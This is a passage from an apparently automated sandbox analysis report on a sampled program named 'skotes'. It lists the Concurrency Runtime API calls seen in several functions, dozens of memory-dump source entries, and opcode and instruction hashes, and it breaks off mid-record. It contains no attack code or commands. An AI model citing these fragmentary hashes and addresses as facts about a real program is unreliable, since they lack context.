                                                                                                                                            • Instruction Fuzzy Hash: C451B7B260021AAFEB215FA4DD41EBB3FE9DF84750F1542A9FE0497281EB74DC1096A0
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 00AEE91E
                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00AEE926
                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00AEE950
                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00AEE959
                                                                                                                                            • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00AEE9DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 512098550-0
                                                                                                                                            • Opcode ID: cab2f787874be3ee0c69206b207a892afd26d0efba3b37b52259748fd841c0c4
                                                                                                                                            • Instruction ID: 44a14f9c9b394993d03d79427e326e5244a7f7c351e3f4a784a2d994fd2cc8f0
                                                                                                                                            • Opcode Fuzzy Hash: cab2f787874be3ee0c69206b207a892afd26d0efba3b37b52259748fd841c0c4
                                                                                                                                            • Instruction Fuzzy Hash: F0414D75A00619EFCB09EF69C954AADF7B6FF88310F048159E906A7391CB74AE41CF81
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00ADECED
                                                                                                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00ADED17
                                                                                                                                              • Part of subcall function 00ADF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00ADF3FA
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00ADED53
                                                                                                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00ADED94
                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00ADEDC6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2568206803-0
                                                                                                                                            • Opcode ID: 61e8c5f11f8df908501ed910734f74fabfaf449c51dff06316dd0b863d3dcdc6
                                                                                                                                            • Instruction ID: 97d21c136849e3b173215eac97c33ae9b814511f1ade1987d2286e628c8e6e10
                                                                                                                                            • Opcode Fuzzy Hash: 61e8c5f11f8df908501ed910734f74fabfaf449c51dff06316dd0b863d3dcdc6
                                                                                                                                            • Instruction Fuzzy Hash: FD316F71A001158FDB15EFA8C9415AEB7F6AF49310B64406FE487EB351DF749E02CBA1
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00AED344
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AED367
                                                                                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00AED370
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AED3A8
                                                                                                                                            • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00AED3B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4212520697-0
                                                                                                                                            • Opcode ID: 943a46e1870c0a43e50c067f884142669b170896d421ab994f1d9eb810cefaf6
                                                                                                                                            • Instruction ID: 908018ac61975202c1229d1e028ab590dda7452e4d3b728b031dad5238736c2b
                                                                                                                                            • Opcode Fuzzy Hash: 943a46e1870c0a43e50c067f884142669b170896d421ab994f1d9eb810cefaf6
                                                                                                                                            • Instruction Fuzzy Hash: BB31AF39700650AFCB05EF66C985BADB7B6BF88310F144199E8069F392DB70ED41CB92
                                                                                                                                            APIs
                                                                                                                                            • _SpinWait.LIBCONCRT ref: 00AE86EE
                                                                                                                                              • Part of subcall function 00ADEAD0: _SpinWait.LIBCONCRT ref: 00ADEAE8
                                                                                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00AE8702
                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00AE8734
                                                                                                                                            • List.LIBCMT ref: 00AE87B7
                                                                                                                                            • List.LIBCMT ref: 00AE87C6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3281396844-0
                                                                                                                                            • Opcode ID: d03c5ec78cdc4f8d47eaecd6ab8c40b9ad2487bf1fcf43a1197f166b98510039
                                                                                                                                            • Instruction ID: c30f5f01da9d77d1872392d2095d3911780e4ec840dbe7e8bbdedb3f23efefb5
